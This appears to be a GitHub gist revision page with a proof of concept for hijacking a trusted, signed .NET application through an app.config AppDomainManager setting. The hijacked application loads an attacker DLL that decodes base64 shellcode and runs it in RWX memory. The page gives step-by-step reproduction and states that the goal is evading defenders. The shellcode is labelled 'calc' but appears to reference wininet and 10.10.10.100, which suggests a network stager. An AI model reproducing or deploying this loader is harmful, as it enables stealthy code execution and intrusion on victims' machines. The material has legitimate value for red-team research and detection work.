-
-
Save aaaddress1/514cd293fc9af37d4455c0adddeac2a2 to your computer and use it in GitHub Desktop.
Revisions
-
Casey Smith revised this gist
Mar 12, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -4,7 +4,7 @@ We can do this by experimenting with .config files. Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly. We do this by directing the application to read a config file we provide. -
Mar 12, 2020 . 1 changed file with 3 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -11,7 +11,8 @@ public override void InitializeNewDomain(AppDomainSetup appDomainInfo) System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!"); // You have more control here than I am demonstrating. For example, you can set ApplicationBase, // Or you can Override the Assembly Resolver, etc... // If you want, execute shellcode or whatever. //bool res = ClassExample.Execute(); return; } @@ -41,7 +42,7 @@ UInt32 dwMilliseconds ); public static bool Execute() { // Its calc, I think ;-) byte[] installercode = System.Convert.FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxMC4xMC4xMC4xMDAAWkiJwUnHwPsgAABNMclTU2oDU0m6V4mfxgAAAAD/1ehHAAAAL3pqckU2QVh2TFh0cUUyc1JORUlLeXd0a3EtSGoyYjhRYVNSNTJCUlVNcjd6VHo2R0ZiX3Q2dTIyU1MyWGp3ZmlaY2RWYgBIicFTWkFYTTHJU0i4ADKghAAAAABQU1NJx8LrVS47/9VIicZqCl9IifFqH1pSaIAzAABJieBqBEFZSbp1Rp6GAAAAAP/VTTHAU1pIifFNMclNMclTU0nHwi0GGHv/1YXAdR9Ix8GIEwAASbpE8DXgAAAAAP/VSP/PdALrquhVAAAAU1lqQFpJidHB4hBJx8AAEAAASbpYpFPlAAAAAP/VSJNTU0iJ50iJ8UiJ2knHwAAgAABJiflJuhKWieIAAAAA/9VIg8QghcB0smaLB0gBw4XAddJYw1hqAFlJx8LwtaJW/9U="); IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40); -
Mar 12, 2020 . 3 changed files with 74 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -10,5 +10,14 @@ We do this by directing the application to read a config file we provide. See Poc Below. Steps to reproduce. ``` 1. Copy some binary you love to say, c:\Test. Lets use aspnet_compiler.exe as an example 2. Compile the test.cs to test.dll and put it in C:\Test 3. Rename app.config to aspnet_compiler.exe.config 4. Execute aspnet_compiler.exe 5. Profit :) ``` Questions/Comments Welcome. This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,9 @@ <configuration> <runtime> <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> <probing privatePath="C:\Test"/> </assemblyBinding> <appDomainManagerAssembly value="test, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" /> <appDomainManagerType value="MyAppDomainManager" /> </runtime> </configuration> This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,56 @@ using System; using System.EnterpriseServices; using System.Runtime.InteropServices; public sealed class MyAppDomainManager : AppDomainManager { public override void InitializeNewDomain(AppDomainSetup appDomainInfo) { System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!"); // You have more control here than I am demonstrating. For example, you can set ApplicationBase, // Or you can Override the Assembly Resolver, etc... bool res = ClassExample.Execute(); return; } } public class ClassExample { //private static UInt32 MEM_COMMIT = 0x1000; //private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); public static bool Execute() { byte[] installercode = System.Convert.FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxMC4xMC4xMC4xMDAAWkiJwUnHwPsgAABNMclTU2oDU0m6V4mfxgAAAAD/1ehHAAAAL3pqckU2QVh2TFh0cUUyc1JORUlLeXd0a3EtSGoyYjhRYVNSNTJCUlVNcjd6VHo2R0ZiX3Q2dTIyU1MyWGp3ZmlaY2RWYgBIicFTWkFYTTHJU0i4ADKghAAAAABQU1NJx8LrVS47/9VIicZqCl9IifFqH1pSaIAzAABJieBqBEFZSbp1Rp6GAAAAAP/VTTHAU1pIifFNMclNMclTU0nHwi0GGHv/1YXAdR9Ix8GIEwAASbpE8DXgAAAAAP/VSP/PdALrquhVAAAAU1lqQFpJidHB4hBJx8AAEAAASbpYpFPlAAAAAP/VSJNTU0iJ50iJ8UiJ2knHwAAgAABJiflJuhKWieIAAAAA/9VIg8QghcB0smaLB0gBw4XAddJYw1hqAFlJx8LwtaJW/9U="); IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40); Marshal.Copy(installercode, 0, (IntPtr)(funcAddr), installercode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero; hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); return true; } } -
Mar 12, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,14 @@ ### Let's turn Any .NET Application into an LOL Bin We can do this by experimenting with .config files. Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name In this example, we don't have to rename anything. We simple coerce a trusted signed app to laod our Assembly. We do this by directing the application to read a config file we provide. See Poc Below. Questions/Comments Welcome.
Casey Smith
revised
this gist